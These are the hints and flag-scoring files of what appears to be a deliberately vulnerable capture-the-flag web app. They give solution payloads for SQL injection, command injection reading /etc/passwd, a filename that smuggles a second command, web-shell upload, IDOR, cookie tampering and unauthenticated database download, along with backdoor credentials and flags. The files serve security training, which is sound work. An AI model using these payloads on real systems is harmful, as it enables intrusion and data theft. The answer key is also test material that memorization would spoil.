12 | Hint 1 (Click to reveal) 13 | 14 | Check the README.md file for clues about default accounts. 15 | 16 |
17 | 18 |
19 | Hint 2 20 | 21 | Look for officer names mentioned in the documentation. One of them has a memorable password. 22 | 23 |
24 | 25 |
26 | Solution 27 | 28 | Username: `carl` 29 | Password: `ilovemywife` 30 | 31 |
32 | 33 | --- 34 | 35 | ### Challenge: Find Easter Eggs 36 | 37 |
38 | Hint 1 39 | 40 | Try typing special phrases in input fields on the dashboard. 41 | 42 |
43 | 44 |
45 | Hint 2 46 | 47 | The phrase contains the word "admin" and is polite. 48 | 49 |
50 | 51 |
52 | Solution 53 | 54 | Type "please admin" in any input field on the dashboard to reveal admin credentials. 55 | 56 |
57 | 58 | --- 59 | 60 | ## 🟡 Level 2 - Authentication Bypass (Medium) 61 | 62 | ### Challenge: SQL Injection Login 63 | 64 |
65 | Hint 1 66 | 67 | The login form might be vulnerable to SQL injection. What happens if you add SQL syntax to your input? 68 | 69 |
70 | 71 |
72 | Hint 2 73 | 74 | Try using SQL comments (--) to bypass password verification. 75 | 76 |
77 | 78 |
79 | Hint 3 80 | 81 | The query structure is: `SELECT * FROM officers WHERE username='$username' AND password='$password'` 82 | 83 |
84 | 85 |
86 | Solution 87 | 88 | Username: `admin'--` 89 | Password: (anything) 90 | 91 | This comments out the password check, logging you in as admin. 92 | 93 |
94 | 95 | --- 96 | 97 | ### Challenge: Cookie Manipulation 98 | 99 |
100 | Hint 1 101 | 102 | Check what cookies are set after login. Can you modify them? 103 | 104 |
105 | 106 |
107 | Hint 2 108 | 109 | Look for cookies that might control admin access. The name might be obvious. 110 | 111 |
112 | 113 |
114 | Solution 115 | 116 | Set a cookie: `override_admin=true` 117 | This will grant you admin privileges on the next request. 118 | 119 |
120 | 121 | --- 122 | 123 | ### Challenge: Session Fixation 124 | 125 |
126 | Hint 1 127 | 128 | Can you control the session ID before logging in? 129 | 130 |
131 | 132 |
133 | Hint 2 134 | 135 | Try adding a URL parameter to set the session ID. 136 | 137 |
138 | 139 |
140 | Solution 141 | 142 | Visit: `login.php?sessionid=your_custom_session_id` 143 | This sets a predictable session ID you can hijack. 144 | 145 |
146 | 147 | --- 148 | 149 | ## 🔴 Level 3 - Command Injection (Hard) 150 | 151 | ### Challenge: Ping Command Injection 152 | 153 |
154 | Hint 1 155 | 156 | The "Warship Status" feature executes a ping command. Can you inject additional commands? 157 | 158 |
159 | 160 |
161 | Hint 2 162 | 163 | Try using command separators like `;`, `&&`, or `||` to chain commands. 164 | 165 |
166 | 167 |
168 | Hint 3 169 | 170 | The vulnerable code: `system("ping -c 2 " . $_GET['check_status']);` 171 | 172 |
173 | 174 |
175 | Solution 176 | 177 | Input: `127.0.0.1; whoami` 178 | Or: `127.0.0.1 && cat /etc/passwd` 179 | Or: `127.0.0.1; ls -la` 180 | 181 |
182 | 183 | --- 184 | 185 | ### Challenge: File Upload RCE 186 | 187 |
188 | Hint 1 189 | 190 | The file upload feature doesn't validate file types. Can you upload a PHP file? 191 | 192 |
193 | 194 |
195 | Hint 2 196 | 197 | Upload a PHP web shell and then access it directly. 198 | 199 |
200 | 201 |
202 | Solution 203 | 204 | 1. Create a file `shell.php`: 205 | 206 | ```php 207 | 208 | ``` 209 | 210 | 2. Upload it via the mission upload form 211 | 3. Access: `mission_uploads/shell.php?cmd=whoami` 212 |
213 | 214 | --- 215 | 216 | ## ⚫ Level 4 - Advanced Exploitation (Expert) 217 | 218 | ### Challenge: IDOR (Insecure Direct Object Reference) 219 | 220 |
221 | Hint 1 222 | 223 | The officer profile viewer uses an ID parameter. Can you view other officers' profiles? 224 | 225 |
226 | 227 |
228 | Hint 2 229 | 230 | Try changing the `officer_id` parameter to different numbers. 231 | 232 |
233 | 234 |
235 | Solution 236 | 237 | Visit: `view_profile.php?officer_id=1` 238 | Then try: `view_profile.php?officer_id=2`, `officer_id=3`, etc. 239 | You can view any officer's private information. 240 | 241 |
242 | 243 | --- 244 | 245 | ### Challenge: XSS (Cross-Site Scripting) 246 | 247 |
248 | Hint 1 249 | 250 | Look for URL parameters that are reflected in the page without sanitization. 251 | 252 |
253 | 254 |
255 | Hint 2 256 | 257 | The `welcome` parameter in the admin panel and the `greeting` parameter in the dashboard are vulnerable. 258 | 259 |
260 | 261 |
262 | Solution 263 | 264 | Visit: `admin/index.php?welcome=` 265 | Or: `dashboard.php?greeting=` 266 | 267 |
268 | 269 | --- 270 | 271 | ### Challenge: Database Backup Access 272 | 273 |
274 | Hint 1 275 | 276 | There's a database backup feature accessible to admins. But does it check authentication? 277 | 278 |
279 | 280 |
281 | Hint 2 282 | 283 | Try accessing `/admin/backup_db.php` directly. 284 | 285 |
286 | 287 |
288 | Solution 289 | 290 | Visit: `admin/backup_db.php?download=1` 291 | Downloads the entire database without authentication! 292 | 293 |
294 | 295 | --- 296 | 297 | ## 🎮 Hidden Easter Eggs 298 | 299 | ### Easter Egg 1: Backdoor Account 300 | 301 |
302 | Hint 303 | 304 | There's a hardcoded backdoor account in the login code. Check for unusual username/password combinations. 305 | 306 |
307 | 308 |
309 | Solution 310 | 311 | Username: `navyseal` 312 | Password: `open sesame` 313 | 314 |
315 | 316 | --- 317 | 318 | ### Easter Egg 2: Debug Mode 319 | 320 |
321 | Hint 322 | 323 | Try using "debug" as a username to see what happens. 324 | 325 |
326 | 327 |
328 | Solution 329 | 330 | Username: `debug` 331 | Password: (anything) 332 | Reveals the SQL query being executed. 333 | 334 |
335 | 336 | --- 337 | 338 | ### Easter Egg 3: Secret Backup Code 339 | 340 |
341 | Hint 342 | 343 | The backup page has a secret code parameter. It's a leet speak number. 344 | 345 |
346 | 347 |
348 | Solution 349 | 350 | Visit: `admin/backup_db.php?code=1337` 351 | Reveals: `CTF{backdoor_backup_1337}` 352 | 353 |
354 | 355 | --- 356 | 357 | ### Easter Egg 4: Konami Code 358 | 359 |
360 | Hint 361 | 362 | Try the classic Konami code on the admin panel. 363 | 364 |
365 | 366 |
367 | Solution 368 | 369 | On the admin panel, press: ↑↑↓↓←→←→BA 370 | Unlocks the secret admin console. 371 | 372 |
373 | 374 | --- 375 | 376 | ### Easter Egg 5: Right-Click Secret 377 | 378 |
379 | Hint 380 | 381 | Try right-clicking on the admin panel page. 382 | 383 |
384 | 385 |
386 | Solution 387 | 388 | Right-click anywhere on the admin panel to reveal the hidden command console. 389 | 390 |
391 | 392 | --- 393 | 394 | ## 🏆 Achievement Guide 395 | 396 | ### Script Kiddie (3 Easter Eggs) 397 | 398 | Find any 3 easter eggs from the list above. 399 | 400 | ### SQL Ninja 401 | 402 | Successfully exploit SQL injection to gain unauthorized access. 403 | 404 | ### Command Master 405 | 406 | Achieve remote code execution via command injection. 407 | 408 | ### Admin Pwned 409 | 410 | Gain admin access using at least 3 different methods. 411 | 412 | ### Full Compromise 413 | 414 | Exploit all 22 documented vulnerabilities. 415 | 416 | --- 417 | 418 | ## 💡 General Tips 419 | 420 | 1. **Use Browser DevTools**: Inspect cookies, local storage, and network requests 421 | 2. **Try Burp Suite**: Intercept and modify requests 422 | 3. **Read the Source**: Sometimes hints are in HTML comments or JavaScript 423 | 4. **Check Logs**: Some actions are logged and might reveal information 424 | 5. **Think Like an Attacker**: What would you try if this was a real system? 425 | 426 | --- 427 | 428 | ## 📚 Need More Help? 429 | 430 | If you're still stuck, check out: 431 | 432 | - `RESOURCES.md` for learning materials 433 | - `FLAGS.md` for the complete list of challenges 434 | - The source code (but try without it first!) 435 | 436 | Good luck, and happy hacking! 
🚀 437 | -------------------------------------------------------------------------------- /FLAGS.md: -------------------------------------------------------------------------------- 1 | # 🚩 HIVE Naval System - Flags & Scoring 2 | 3 | ## 📊 Scoring System 4 | 5 | **Total Possible Points**: 285 6 | **Total Flags**: 32 7 | 8 | --- 9 | 10 | ## 🟢 Easy Flags (5 points each) - 50 points total 11 | 12 | ### FLAG-001: Default Login ✓ 13 | 14 | **Points**: 5 15 | **Challenge**: Login with default credentials 16 | **Flag**: `CTF{carl_loves_his_wife}` 17 | **How to capture**: Login as `carl` / `ilovemywife` 18 | 19 | ### FLAG-002: Easter Egg - Please Admin ✓ 20 | 21 | **Points**: 5 22 | **Challenge**: Find the dashboard easter egg 23 | **Flag**: `CTF{admin_credentials_revealed}` 24 | **How to capture**: Type "please admin" in any dashboard input field 25 | 26 | ### FLAG-003: Backdoor Account ✓ 27 | 28 | **Points**: 5 29 | **Challenge**: Find the hardcoded backdoor 30 | **Flag**: `CTF{navyseal_backdoor_access}` 31 | **How to capture**: Login as `navyseal` / `open sesame` 32 | 33 | ### FLAG-004: Debug Mode ✓ 34 | 35 | **Points**: 5 36 | **Challenge**: Trigger debug information leak 37 | **Flag**: `CTF{debug_query_exposed}` 38 | **How to capture**: Login with username `debug` and any password 39 | 40 | ### FLAG-005: Secret Backup Code ✓ 41 | 42 | **Points**: 5 43 | **Challenge**: Find the backup easter egg 44 | **Flag**: `CTF{backdoor_backup_1337}` 45 | **How to capture**: Visit `admin/backup_db.php?code=1337` 46 | 47 | ### FLAG-006: Konami Code ✓ 48 | 49 | **Points**: 5 50 | **Challenge**: Unlock the secret console 51 | **Flag**: `CTF{konami_code_master}` 52 | **How to capture**: Enter ↑↑↓↓←→←→BA on admin panel 53 | 54 | ### FLAG-007: Right-Click Console ✓ 55 | 56 | **Points**: 5 57 | **Challenge**: Find the hidden admin console 58 | **Flag**: `CTF{right_click_revealed}` 59 | **How to capture**: Right-click on admin panel 60 | 61 | ### FLAG-008: Honeypot Discovery ✓ 62 | 63 | 
**Points**: 5 64 | **Challenge**: Trigger the honeypot 65 | **Flag**: `CTF{honeypot_triggered}` 66 | **How to capture**: Fill the hidden honeypot field in login form 67 | 68 | ### FLAG-009: Admin Login ✓ 69 | 70 | **Points**: 5 71 | **Challenge**: Login as admin 72 | **Flag**: `CTF{admin_panel_accessed}` 73 | **How to capture**: Login as `admin` / `navy12345` 74 | 75 | ### FLAG-010: Database Exposed ✓ 76 | 77 | **Points**: 5 78 | **Challenge**: View officer database 79 | **Flag**: `CTF{officer_database_leaked}` 80 | **How to capture**: Access `components/upload.php` to see all officers 81 | 82 | --- 83 | 84 | ## 🟡 Medium Flags (10 points each) - 100 points total 85 | 86 | ### FLAG-011: SQL Injection Login ⚔️ 87 | 88 | **Points**: 10 89 | **Challenge**: Bypass authentication with SQL injection 90 | **Flag**: `CTF{sql_injection_pwned}` 91 | **How to capture**: Login with `admin'--` as username 92 | 93 | ### FLAG-012: Cookie Manipulation ⚔️ 94 | 95 | **Points**: 10 96 | **Challenge**: Escalate privileges via cookie 97 | **Flag**: `CTF{cookie_privilege_escalation}` 98 | **How to capture**: Set cookie `override_admin=true` and access admin panel 99 | 100 | ### FLAG-013: Session Fixation ⚔️ 101 | 102 | **Points**: 10 103 | **Challenge**: Fix a session ID 104 | **Flag**: `CTF{session_fixation_attack}` 105 | **How to capture**: Visit `login.php?sessionid=hacked123` and login 106 | 107 | ### FLAG-014: IDOR - View All Officers ⚔️ 108 | 109 | **Points**: 10 110 | **Challenge**: Access unauthorized officer profiles 111 | **Flag**: `CTF{idor_all_officers_exposed}` 112 | **How to capture**: Access `view_profile.php?officer_id=1` through `officer_id=70` 113 | 114 | ### FLAG-015: XSS in Dashboard ⚔️ 115 | 116 | **Points**: 10 117 | **Challenge**: Execute JavaScript in dashboard 118 | **Flag**: `CTF{xss_dashboard_pwned}` 119 | **How to capture**: Visit `dashboard.php?greeting=` 120 | 121 | ### FLAG-016: XSS in Admin Panel ⚔️ 122 | 123 | **Points**: 10 124 | **Challenge**: Execute 
JavaScript in admin panel 125 | **Flag**: `CTF{xss_admin_pwned}` 126 | **How to capture**: Visit `admin/index.php?welcome=` 127 | 128 | ### FLAG-017: Unrestricted File Upload ⚔️ 129 | 130 | **Points**: 10 131 | **Challenge**: Upload a malicious file 132 | **Flag**: `CTF{unrestricted_upload_success}` 133 | **How to capture**: Upload any non-text file (e.g., .php, .exe) 134 | 135 | ### FLAG-018: Database Backup Download ⚔️ 136 | 137 | **Points**: 10 138 | **Challenge**: Download the database without auth 139 | **Flag**: `CTF{database_backup_stolen}` 140 | **How to capture**: Visit `admin/backup_db.php?download=1` 141 | 142 | ### FLAG-019: Information Disclosure ⚔️ 143 | 144 | **Points**: 10 145 | **Challenge**: Find hardcoded credentials 146 | **Flag**: `CTF{hardcoded_db_credentials}` 147 | **How to capture**: View `includes/config.php` source 148 | 149 | ### FLAG-020: Session Debug ⚔️ 150 | 151 | **Points**: 10 152 | **Challenge**: Expose session data 153 | **Flag**: `CTF{session_data_exposed}` 154 | **How to capture**: Visit `dashboard.php?debug=1` 155 | 156 | --- 157 | 158 | ## 🔴 Hard Flags (15 points each) - 90 points total 159 | 160 | ### FLAG-021: Command Injection - Ping ⚔️⚔️ 161 | 162 | **Points**: 15 163 | **Challenge**: Execute system commands via ping 164 | **Flag**: `CTF{command_injection_rce}` 165 | **How to capture**: Input `127.0.0.1; cat /etc/passwd` in warship status 166 | 167 | ### FLAG-022: Command Injection - Upload Log ⚔️⚔️ 168 | 169 | **Points**: 15 170 | **Challenge**: Execute commands via filename 171 | **Flag**: `CTF{filename_command_injection}` 172 | **How to capture**: Upload file named `test.txt; whoami` 173 | 174 | ### FLAG-023: File Upload RCE ⚔️⚔️ 175 | 176 | **Points**: 15 177 | **Challenge**: Achieve remote code execution 178 | **Flag**: `CTF{php_webshell_uploaded}` 179 | **How to capture**: Upload PHP shell and execute commands 180 | 181 | ### FLAG-024: CSRF Command Execution ⚔️⚔️ 182 | 183 | **Points**: 15 184 | **Challenge**: 
Execute commands via CSRF 185 | **Flag**: `CTF{csrf_command_execution}` 186 | **How to capture**: POST to admin panel with command parameter 187 | 188 | ### FLAG-025: Path Traversal ⚔️⚔️ 189 | 190 | **Points**: 15 191 | **Challenge**: Access files outside webroot 192 | **Flag**: `CTF{path_traversal_success}` 193 | **How to capture**: Access mission files with `../` sequences 194 | 195 | ### FLAG-026: Diagnostic Console Access ⚔️⚔️ 196 | 197 | **Points**: 15 198 | **Challenge**: Access the admin diagnostic console 199 | **Flag**: `CTF{diagnostic_console_pwned}` 200 | **How to capture**: Access `missions/poc.php` as admin 201 | 202 | --- 203 | 204 | ## ⚫ Expert Flags (20 points each) - 40 points total 205 | 206 | ### FLAG-027: Chain SQLi + Cookie Override ⚔️⚔️⚔️ 207 | 208 | **Points**: 20 209 | **Challenge**: Combine SQL injection with cookie manipulation 210 | **Flag**: `CTF{chained_attack_master}` 211 | **How to capture**: SQLi login + set override_admin cookie 212 | 213 | ### FLAG-028: Full System Compromise ⚔️⚔️⚔️ 214 | 215 | **Points**: 20 216 | **Challenge**: Achieve complete system control 217 | **Flag**: `CTF{full_system_compromise}` 218 | **How to capture**: Upload web shell + execute privileged commands 219 | 220 | --- 221 | 222 | ## 🏆 Achievement Flags (5 points each) - 20 points total 223 | 224 | ### FLAG-029: Script Kiddie 🏅 225 | 226 | **Points**: 5 227 | **Challenge**: Find 3 easter eggs 228 | **Flag**: `CTF{script_kiddie_achievement}` 229 | 230 | ### FLAG-030: SQL Ninja 🥇 231 | 232 | **Points**: 5 233 | **Challenge**: Complete all SQL injection challenges 234 | **Flag**: `CTF{sql_ninja_achievement}` 235 | 236 | ### FLAG-031: Command Master 👑 237 | 238 | **Points**: 5 239 | **Challenge**: Complete all command injection challenges 240 | **Flag**: `CTF{command_master_achievement}` 241 | 242 | ### FLAG-032: Full Compromise 🔥 243 | 244 | **Points**: 5 245 | **Challenge**: Capture all 28 vulnerability flags 246 | **Flag**: `CTF{full_compromise_achievement}` 
247 | 248 | --- 249 | 250 | ## 📈 Difficulty Breakdown 251 | 252 | | Difficulty | Flags | Points Each | Total Points | 253 | | -------------- | ------ | ----------- | ------------ | 254 | | 🟢 Easy | 10 | 5 | 50 | 255 | | 🟡 Medium | 10 | 10 | 100 | 256 | | 🔴 Hard | 6 | 15 | 90 | 257 | | ⚫ Expert | 2 | 20 | 40 | 258 | | 🏆 Achievement | 4 | 5 | 20 | 259 | | **TOTAL** | **32** | - | **300** | 260 | 261 | --- 262 | 263 | ## 🎯 Recommended Path 264 | 265 | ### Beginner Path 266 | 267 | 1. Start with Easy flags (FLAG-001 to FLAG-010) 268 | 2. Learn about SQL injection (FLAG-011) 269 | 3. Try IDOR (FLAG-014) 270 | 4. Experiment with XSS (FLAG-015, FLAG-016) 271 | 272 | ### Intermediate Path 273 | 274 | 1. Complete all Medium flags 275 | 2. Try command injection (FLAG-021) 276 | 3. Upload a web shell (FLAG-023) 277 | 278 | ### Advanced Path 279 | 280 | 1. Complete all Hard flags 281 | 2. Chain multiple vulnerabilities (FLAG-027) 282 | 3. Achieve full compromise (FLAG-028) 283 | 284 | --- 285 | 286 | ## 🏅 Ranking System 287 | 288 | | Points | Rank | 289 | | ------- | ---------------- | 290 | | 0-50 | Recruit | 291 | | 51-100 | Ensign | 292 | | 101-150 | Lieutenant | 293 | | 151-200 | Commander | 294 | | 201-250 | Captain | 295 | | 251-285 | Admiral | 296 | | 285+ | Fleet Admiral ⭐ | 297 | 298 | --- 299 | 300 | ## 📝 Flag Submission 301 | 302 | To track your progress, create a file `my_flags.txt` and record each flag as you find it: 303 | 304 | ``` 305 | FLAG-001: CTF{carl_loves_his_wife} - 5 points 306 | FLAG-002: CTF{admin_credentials_revealed} - 5 points 307 | ... 
308 | Total: XX/285 points 309 | Rank: [Your Rank] 310 | ``` 311 | 312 | --- 313 | 314 | ## 🎮 Speedrun Categories 315 | 316 | ### Any% (Fastest to 100 points) 317 | 318 | Current Record: _Not set_ 319 | 320 | ### 100% (All flags) 321 | 322 | Current Record: _Not set_ 323 | 324 | ### No Hints% (All flags without HINTS.md) 325 | 326 | Current Record: _Not set_ 327 | 328 | --- 329 | 330 | Good luck capturing all the flags! 🚀 331 | --------------------------------------------------------------------------------